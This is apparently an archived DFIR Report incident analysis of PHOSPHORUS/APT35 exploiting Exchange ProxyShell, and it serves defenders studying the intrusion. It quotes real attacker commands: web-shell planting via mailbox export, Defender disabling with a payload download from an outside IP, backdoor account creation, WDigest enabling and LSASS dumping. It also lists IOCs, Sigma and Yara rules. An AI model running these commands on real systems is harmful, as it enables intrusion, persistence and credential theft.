{ "id": "c9d4bf4e-825c-4139-8250-34a922e2d6ee", "created_at": "2026-04-06T00:19:52.405486Z", "updated_at": "2026-04-10T03:34:00.37152Z", "deleted_at": null, "sha1_hash": "477081b009b74c4789b9fac8229e528fec9f3898", "title": "PHOSPHORUS Automates Initial Access Using ProxyShell", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1237387, "plain_text": "PHOSPHORUS Automates Initial Access Using ProxyShell\r\nBy editor\r\nPublished: 2022-03-21 · Archived: 2026-04-05 13:38:52 UTC\r\nIn December 2021, we observed an adversary exploiting the Microsoft Exchange ProxyShell vulnerabilities to gain initial\r\naccess and execute code via multiple web shells. The overlap of activities and tasks was remarkably similar to that observed\r\nin our previous report, “Exchange Exploit Leads to Domain Wide Ransomware“.\r\nIn this intrusion, we observed the initial exploitation of the ProxyShell vulnerabilities followed by some further post-exploitation activity, which included web shells, credential dumping, and specialized payloads. We assess that this activity\r\nwas related to PHOSPHORUS (aka UNC2448, NemesisKitten, and DEV-0270) due to the TTP’s mirroring previously\r\nreported activity that was attributed to the group.\r\nCase Summary\r\nThe threat actors activity occurred in two bursts within a 3 day time frame. As with our previous case, they started by\r\nuploading their web shell and disabling antivirus services.\r\nSoon after, they established two persistence methods. The first was through scheduled tasks, and the second, was via a\r\nnewly created account. The account was then added to the “remote desktop users” and “local administrators users” groups.\r\nLike in the prior case involving ProxyShell, we observed a file masquerading as dllhost.exe that exhibited similarities to a\r\nproxy tool call Fast Reverse Proxy (with modifications) downloaded from the same IP as observed in the prior case and\r\nconnecting to suspect domains.\r\nAfter establishing alternative ways of re-entering the targeted host, they enumerated the environment using Windows native\r\nprograms such as net and ipconfig. At the end of their first visit, they disabled LSA protection, enabled WDigest for access\r\nto plain text credentials later, dumped the LSASS process memory, and downloaded the results via the web shell. \r\nAll of this activity occurred over a time frame of around 2 minutes, leading us to assess that the entire attack was likely\r\nscripted out. The user agent strings of python-requests/2.26.0 and python-urllib3/1.26.7 also point to the use of scripts.\r\nTwo days later, we saw the threat actors reappear. We expected them to pick up where they left off, however, they repeated\r\nall previous actions. Due to the similarity between the commands and the sequential order they ran, this is additional\r\nevidence the threat actors employed automated scripts to execute these activities.\r\nNo further activity was observed as the threat actors were evicted from the network.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt\r\nStrike, BazarLoader, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be\r\nfound here.\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including\r\nSysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 1 of 13\n\nAnalysis and reporting completed by @samaritan_o, @kostastsale, @svch0st and @RoxpinTeddy.\r\nAs  similarly seen in our previous report Exchange Exploit Leads to Domain Wide Ransomware, this threat actor utilized the\r\nMicrosoft Exchange ProxyShell vulnerabilities; an exploit chain of 3 different CVEs:\r\nCVE-2021-34473\r\nCVE-2021-34523\r\nCVE-2021-31207\r\nWith the appropriate PowerShell logging available we were able to recover the PowerShell commandlets executed on the\r\nExchange server, which resulted in the creation of web shells on the host.\r\nOnce the threat actor had gained a valid privileged session using CVE-2021-34473 and CVE-2021-34523, they then ensured\r\nthe default Administrator account had the correct role for mailbox importing and exporting:\r\nNew-ManagementRoleAssignment -Role \"Mailbox Import Export\" -User \"administrator@\u003cREDACTED\u003e\"\r\nThe threat actor initiated a mailbox export that matched the search criteria of Subject -eq 'aspx_wkggiyvttmu' to a\r\nprovided location with the .aspx extension. While the file created is a legitimate .pst file, in it contains plaintext web shell\r\ncode that is rendered by IIS when requested.\r\nNew-MailboxExportRequest -Mailbox \"administrator@\u003cREDACTED\u003e\" -FilePath \"\\\\localhost\\C$\\Program Files\\Microsoft\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 2 of 13\n\nIn an attempt to hide the actions taken, the actor removes the request just created:\r\nRemove-MailboxExportRequest -Confirm \"False\" -Force \"True\" -Identity \"77a883a7-470c-471c-a193-f4c54f263fde\"\r\nThis activity then repeated approximately 2 days after the initial exploitation. As the actor had already achieved remote\r\nexecution by this point, there is a high likelihood the exploitation of Exchange servers is automated. Below is the second\r\nweb shell created that shares the same naming convention as the first.\r\nNew-MailboxExportRequest -Mailbox \"administrator@\u003cREDACTED\u003e\" -FilePath \"\\\\localhost\\c$\\inetpub\\wwwroot\\aspnet_\r\nExecution\r\nApproximately 20 seconds after the web shell aspx_wkggiyvttmu.aspx was created, a flurry of POST requests were sent to\r\nthe web shell.\r\nThe web shell followed a similar structure seen in previous cases. At least two parameters are sent in the POST request to\r\nthe web shell, delimiter which defines what string is used to separate the response, and exec_code which is the\r\ncommand to be ran. The web shell had predefined functions for special actions:\r\nget – Get file from location on disk (additional dst POST parameter)\r\nput – Upload file to location (additional dst POST parameter)\r\nrun – Execute a list of commands separated by “;” using PowerShell.\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 3 of 13\n\nIf exec_code does not start with one of the above commands, it will simply attempt to run it with PowerShell.\r\nThe environment for this investigation had SSL inspection and PCAPs available for analysis which allowed us to see the\r\ncommands being sent to the web shell itself. Below you can see an example of commands that were sent and the outputs\r\nthey returned in the response.\r\nThe actor first uploaded a file Wininet.xml , which is later used to create a scheduled task, to C:\\windows\\temp using the\r\nput command of the web shell. This was followed shortly by several commands to impair Windows Defender before\r\ndownloading and executing a fake dllhost.exe from 148.251.71[.]182.\r\nScheduled Task Commands:\r\nschtasks.exe /Create /F /XML C:\\windows\\temp\\Wininet.xml /tn '\\Microsoft\\Windows\\Maintenance\\Wininet'\r\nschtasks.exe /Run /tn '\\Microsoft\\Windows\\Maintenance\\Wininet'\r\nDefender Modification Command:\r\ntry {Set-MpPreference -DisableBehaviorMonitoring 1 -AsJob; Set-MpPreference -SevereThreatDefaultAction Allow -\r\nStart-Process powershell.exe {$file='c:\\windows\\dllhost.exe'; Invoke-WebRequest -Uri 'hXXp://148.251.71[.]182/\r\nThe schedule task runs a batch script called Wininet.bat which was also uploaded through the web shell. Wininet.bat\r\nsimply loops through the execution of the file dllhost.exe .\r\nThe file dllhost.exe is a golang binary. When executed, the binary was observed resolving the following domains:\r\napi.myip[.]com (for discovery)\r\ntcp443.msupdate[.]us\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 4 of 13\n\nkcp53.msupdate[.]us\r\nThe binary also spawns the following commands when executed:\r\ncmd /c wmic computersystem get domain\r\npowershell /c Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -\r\nExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders\r\nThe binary has a low confidence reference to FRP (FastReverseProxy) as the sample matches the closed source Yara rule –\r\nHKTL_PUA_FRP_FastReverseProxy_Oct21_1 (by Florian Roth) however it does not behave in the same way as the open\r\nsource tool. This file also matches on an additional Yara rule more recently –\r\nAPT_MAL_Go_FRP_CharmingKitten_Jan22_1 pointing to the file including some code from FRP but otherwise having\r\nbeen modified for use by this threat actor.\r\nPersistence\r\nThe threat actor utilized both account creation and scheduled tasks to gain persistence in the environment.\r\nNew account creation\r\nDuring the first activity, we observed the use of user.exe executable that ran the following PowerShell command:\r\npowershell.exe /c net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user D\r\nThe first thing they did was make a new user named DefaultAccount with the password P@ssw0rd123412 . They then\r\nactivated the account and changed the password ( P@ssw0rd12341234 ) for the second time. Finally the commands added the\r\nnew account to the Administrators group and Remote Desktop Users group.\r\nThe threat actors ran the same command again two days later:\r\npowershell.exe /c net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user D\r\nDue to the close proximity between executed commands, we assess that the threat actors used tools to automate the\r\nexecution and discovery phases of this attack.\r\nScheduled task\r\nAs previously noted, we discovered the creation of a Scheduled task from a .xml template that was copied to the server via\r\nthe web shell.\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 5 of 13\n\nBelow, we can observe the content of wininet.xml:\r\nThe following commands where then ran to initiate the task and to achieve persistence:\r\nschtasks.exe /Create /F /XML %wintmp%\\Wininet.xml /tn '\\Microsoft\\Windows\\Maintenance\\Wininet'\r\nschtasks.exe /Run /tn '\\Microsoft\\Windows\\Maintenance\\Wininet'\r\nPrivilege Escalation\r\nThe scheduled task created by the web shell was set to use the principal SID “S-1-5-18”, or SYSTEM.\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 6 of 13\n\n\u003cUserId\u003eS-1-5-18\u003c/UserId\u003e\r\nDefense Evasion\r\nUsing PowerShell the threat actors issued several commands to impair Windows Defender including:\r\nWindows Defender Behavior Monitoring was disabled.\r\nThe Severe Threat default action was set to ‘Allow’.\r\nRealtime Monitoring was disabled.\r\nThe ‘C:\\Windows’ path was excluded from scheduled and real-time scanning.\r\ntry {Set-MpPreference -DisableBehaviorMonitoring 1 -AsJob; Set-MpPreference -SevereThreatDefaultAction Allow -\r\nA rule was added to the Windows Firewall to allow remote RDP traffic.\r\n\"netsh\" advfirewall firewall add rule name=\"Terminal Server\" dir=in action=allow protocol=TCP localport=3389\r\nRemote Desktop Services was started.\r\n\"net\" start TermService\r\nThe threat actor enabled WDigest authentication. This enforces the storage of credentials in plaintext on future logins.\r\n\"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /\r\nLSA protection was disabled.\r\n\"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v RunAsPPL /t REG_DWORD /d 0 /f\r\nCredential Access\r\nThe threat actor created a process memory dump from LSASS.exe. In this case they created a “minidump” using the\r\nLOLBIN comsvcs.dll. This was dropped to disk as ssasl.pmd (lsass.dmp reversed) and then zipped before exfiltration.\r\n\"powershell.exe\" /c Remove-Item -Path C:\\windows\\temp\\ssasl.pmd -Force -ErrorAction Ignore; rundll32.exe C:\\wi\r\nDiscovery\r\nThe threat actors used native Windows binaries to enumerate the exploited server in an automated fashion. They executed\r\ncommands such as:\r\nnet.exe user\r\nipconfig.exe /all\r\npowershell.exe (multiple commands)\r\nquser.exe\r\nThese discovery tasks like the rest of the activity observed from this threat actor was executed via the web shell.\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 7 of 13\n\nThey used the PowerShell module Get-WmiObject to collect the name and IP address of the domain controller.\r\nGet-WMIObject Win32_NTDomain | findstr DomainController\r\nAdditionally, we saw threat actors retrieving an email address from the compromised exchange server using the below\r\ncommand. This was likely done as a test. \r\nAdd-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;Get-Recipient | Select Name-ExpandProperty Emai\r\nCollection\r\nWhile having access to the Exchange server, we observed no attempts to export or access user mailboxes.\r\nCommand and Control\r\nAs we saw from the execution section, dllhost.exe was used to access the below domains for C2, which we believe was\r\nusing a variation of FRP.\r\ntcp443.msupdate[.]us (107.173.231[.]114)\r\nkcp53.msupdate[.]us \r\n(107.173.231[.]114)\r\nThis C2 channel was not used very much as most activity was done through the web shell.\r\nExfiltration\r\nThe only successful data that was exfiltrated from the environment was the archive containing the LSASS dump.\r\nHere you can see the threat actor using the web shell command to extract it: \r\nImpact\r\nIn this case, there was no further impact to the environment before the threat actors were evicted. Due to our previous report\r\nand OSINT research we believe with medium to high confidence that this intrusion would have ended in ransomware.\r\nIndicators\r\nAll artifacts including web shells, files, IPs, etc. were added to our services in December.\r\nNetwork\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 8 of 13\n\nipv4:148.251.71[.]182\r\nipv4:107.173.231[.]114\r\ndomain: tcp443.msupdate[.]us\r\ndomain: kcp53.msupdate[.]us\r\nuseragent:python-urllib3/1.26.7\r\nuseragent:python-requests/2.26.0\r\nFile\r\naspx_dyukbdcxjfi.aspx\r\n1a5ad24a6880eea807078375d6461f58\r\nda2470c3990ea0862a79149c6036388498da83cd\r\n84f77fc4281ebf94ab4897a48aa5dd7092cc0b7c78235965637eeef0908fb6c7\r\ndhvqx.aspx\r\nb2fde6dc7bd1e04ce601f57805de415b\r\n4d243969b54b9b80c1d26e0801a6e7e46d2ef03e\r\nc5aae30675cc1fd83fd25330cec245af744b878a8f86626d98b8e7fcd3e970f8\r\ndllhost.exe\r\n9a3703f9c532ae2ec3025840fa449d4e\r\n8ece87086e8b5aba0d1cc4ec3804bf74e0b45bee\r\n1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e\r\nwininet.bat\r\n5f098b55f94f5a448ca28904a57c0e58\r\n27102b416ef5df186bd8b35190c2a4cc4e2fbf37\r\n668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0\r\nwininet.xml\r\nd2f4647a3749d30a35d5a8faff41765e\r\n0f676bc786db3c44cac4d2d22070fb514b4cb64c\r\n559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e\r\nuser.exe\r\nf0be699c8aafc41b25a8fc0974cc4582\r\n6bae2d45bbd8c4b0a59ba08892692fe86e596154\r\n7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b\r\ntask_update.exe\r\ncacb64bdf648444e66c82f5ce61caf4b\r\n3a6431169073d61748829c31a9da29123dd61da8\r\n12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075f\r\nDetections\r\nNetwork\r\nET INFO User-Agent (python-requests) Inbound to Webserver\r\nET INFO Generic HTTP EXE Upload Inbound\r\nET INFO Generic HTTP EXE Upload Outbound\r\nGPL ATTACK_RESPONSE command completed\r\nET ATTACK_RESPONSE Net User Command Response\r\nET WEB_SERVER WebShell Generic - netsh firewall\r\nSigma\r\nCustom rules\r\nExchange Webshell creation – https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/exchange_webshell_creation\r\nDefaultAccount Usage – https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/defaultaccount_usage\r\nSigmaHQ rules\r\nLocal Accounts Discovery –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_local_system_owner_acco\r\nLsass Memory Dump via Comsvcs DLL –\r\nhttps://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/process_access/sysmon_lsass_dump_comsvcs_d\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 9 of 13\n\nNet.exe Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/777d218adc789b7f1b146701793e78799324d87d/rules/windows/process_creation/win_susp_net_execution.yml\r\nNet-exe User Account Creation –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_net_user_add.yml\r\nNetsh Port or Application Allowed –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_fw_add.yml\r\nNetsh RDP Port Opening –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_allow_port_rdp.yml\r\nNon Interactive PowerShell –\r\nhttps://github.com/SigmaHQ/sigma/blob/1425ede905514b7dbf3c457561aaf2ff27274724/rules/windows/process_creation/win_non_interactive_powershe\r\nPowershell Defender Exclusion –\r\nhttps://github.com/SigmaHQ/sigma/blob/682e0458a336c3a6e93b18f7e972e1d67ef01598/rules/windows/process_creation/win_powershell_defender_exc\r\nPowerShell Get-Process LSASS –\r\nhttps://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/process_creation/win_susp_powershell_getproce\r\nProcess Dump via Comsvcs DLL –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_susp_comsvcs_procdump.\r\nQuick Execution of a Series of Suspicious Commands –\r\nhttps://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_multiple_suspicious_cli.y\r\nRare Scheduled Task Creations –\r\nhttps://github.com/SigmaHQ/sigma/blob/04f72b9e78f196544f8f1331b4d9158df34d7ecf/rules/windows/other/taskscheduler/win_rare_schtask_creation.ym\r\nService Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_service_execution.yml\r\nShells Spawned by Web Servers –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_webshell_spawn.yml\r\nSuspicious PowerShell Parent Process –\r\nhttps://github.com/SigmaHQ/sigma/blob/6f5271275e9ac22be9ded8b9252bce064e524153/rules/windows/process_creation/win_susp_powershell_parent_\r\nSuspicious Script Execution From Temp Folder –\r\nhttps://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_susp_script_exec_from_te\r\nWdigest Enable UseLogonCredential –\r\nhttps://github.com/SigmaHQ/sigma/blob/503df469687fe4d14d2119a95723485d079ec0d9/rules/windows/registry_event/sysmon_wdigest_enable_uselogo\r\nWebshell Detection With Command Line Keywords –\r\nhttps://github.com/SigmaHQ/sigma/blob/1cfca93354d25e458db40f8d48403602b46bbf03/rules/windows/process_creation/win_webshell_detection.yml\r\nWindows Defender Real-Time Protection Disabled –\r\nhttps://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_realtime_\r\nWindows Defender Threat Detection Disabled –\r\nhttps://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_disabled\r\nWindows Shell Spawning Suspicious Program –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_shell_spawn_susp_program\r\nWindows Suspicious Use Of Web Request in CommandLine –\r\nhttps://github.com/SigmaHQ/sigma/blob/98d7380a40d503ffd225420f7318b79d9f5097b8/rules/windows/process_creation/process_creation_susp_web_re\r\nWindows Webshell Creation –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/file_event/sysmon_webshell_creation_detect.ym\r\nYara\r\nrule files_dhvqx {\r\n meta:\r\n description = \"9893_files - file dhvqx.aspx\"\r\n author = \"TheDFIRReport\"\r\n reference = \"https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\"\r\n date = \"2022-03-21\"\r\n hash1 = \"c5aae30675cc1fd83fd25330cec245af744b878a8f86626d98b8e7fcd3e970f8\"\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 10 of 13\n\nstrings:\n $s1 = \"eval(Request['exec_code'],'unsafe');Response.End;\" fullword ascii\n $s2 = \"6\n\ncondition:\n uint16(0) == 0x5a4d and filesize \u003c 300KB and\n 1 of ($x*) and 4 of them\n}\nrule task_update {\n meta:\n description = \"9893_files - file task_update.exe\"\n author = \"TheDFIRReport\"\n reference = \"https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\"\n date = \"2022-03-21\"\n hash1 = \"12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a\"\n strings:\n $x1 = \" \u003c/\n $s3 = \"-InitOnceExecuteOnce\" fullword ascii\n $s4 = \"\u003e\n\nrule _user_task_update_0 {\r\n meta:\r\n description = \"9893_files - from files user.exe, task_update.exe\"\r\n author = \"TheDFIRReport\"\r\n reference = \"https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\"\r\n date = \"2022-03-21\"\r\n hash1 = \"7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b\"\r\n hash2 = \"12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a\"\r\n strings:\r\n $s1 = \"-InitOnceExecuteOnce\" fullword ascii\r\n $s2 = \"PB_GadgetStack_%I64i\" fullword ascii\r\n $s3 = \"PB_DropAccept\" fullword ascii\r\n $s4 = \"PB_PostEventMessage\" fullword ascii\r\n $s5 = \"PB_WindowID\" fullword ascii\r\n $s6 = \"?GetLongPathNameA\" fullword ascii\r\n $s7 = \"Memory page error\" fullword ascii\r\n $s8 = \"PPPPPPH\" fullword ascii\r\n $s9 = \"YZAXAYH\" fullword ascii\r\n $s10 = \"%d:%I64d:%I64d:%I64d\" fullword ascii\r\n $s11 = \"PYZAXAYH\" fullword ascii\r\n $s12 = \"PB_MDI_Gadget\" fullword ascii\r\n $s13 = \"PostEventClass\" fullword ascii\r\n $s14 = \"t$hYZAXAYH\" fullword ascii\r\n $s15 = \"$YZAXAYH\" fullword ascii\r\n $s16 = \"Floating-point underflow (exponent too small)\" fullword ascii\r\n $s17 = \"Inexact floating-point result\" fullword ascii\r\n $s18 = \"Single step trap\" fullword ascii\r\n $s19 = \"Division by zero (floating-point)\" fullword ascii\r\n $s20 = \"tmHcI(H\" fullword ascii\r\n condition:\r\n ( uint16(0) == 0x5a4d and filesize \u003c 300KB and ( 8 of them )\r\n ) or ( all of them )\r\n}\r\nMITRE\r\nExploit Public-Facing Application – T1190\r\nOS Credential Dumping – T1003\r\nAccount Manipulation – T1098\r\nValid Accounts – T1078\r\nIngress Tool Transfer – T1105\r\nMatch Legitimate Name or Location – T1036.005\r\nWindows Service – T1543.003\r\nWeb Shell – T1505.003\r\nSystem Information Discovery – T1082\r\nSystem Network Configuration Discovery – T1016\r\nSystem Owner/User Discovery – T1033\r\nWindows Command Shell – T1059.003\r\nInternal case #9893\r\nSource: https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell" ], "report_names": [ "apt35-automates-initial-access-using-proxyshell" ], "threat_actors": [ { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6b4a82e8-21f1-4bc7-84cf-e27334998b48", "created_at": "2022-10-25T16:07:23.84296Z", "updated_at": "2026-04-10T02:00:04.762229Z", "deleted_at": null, "main_name": "DEV-0270", "aliases": [ "DEV-0270", "DireFate", "Lord Nemesis", "Nemesis Kitten", "Yellow Dev 23", "Yellow Dev 24" ], "source_name": "ETDA:DEV-0270", "tools": [ "Impacket", "LOLBAS", "LOLBins", "Living off the Land", "WmiExec" ], "source_id": "ETDA", "reports": null }, { "id": "eaef3218-1f8c-4767-b1ff-da7a6662acc0", "created_at": "2023-03-04T02:01:54.110909Z", "updated_at": "2026-04-10T02:00:03.359871Z", "deleted_at": null, "main_name": "DEV-0270", "aliases": [ "Nemesis Kitten", "Storm-0270" ], "source_name": "MISPGALAXY:DEV-0270", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7", "created_at": "2025-08-07T02:03:24.764883Z", "updated_at": "2026-04-10T02:00:03.611225Z", "deleted_at": null, "main_name": "COBALT MIRAGE", "aliases": [ "DEV-0270 ", "Nemesis Kitten ", "PHOSPHORUS ", "TunnelVision ", "UNC2448 " ], "source_name": "Secureworks:COBALT MIRAGE", "tools": [ "BitLocker", "Custom powershell scripts", "DiskCryptor", "Drokbk", "FRPC", "Fast Reverse Proxy (FRP)", "Impacket wmiexec", "Ngrok", "Plink", "PowerLessCLR", "TunnelFish" ], "source_id": "Secureworks", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434792, "ts_updated_at": 1775792040, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/477081b009b74c4789b9fac8229e528fec9f3898.pdf", "text": "https://archive.orkl.eu/477081b009b74c4789b9fac8229e528fec9f3898.txt", "img": "https://archive.orkl.eu/477081b009b74c4789b9fac8229e528fec9f3898.jpg" } }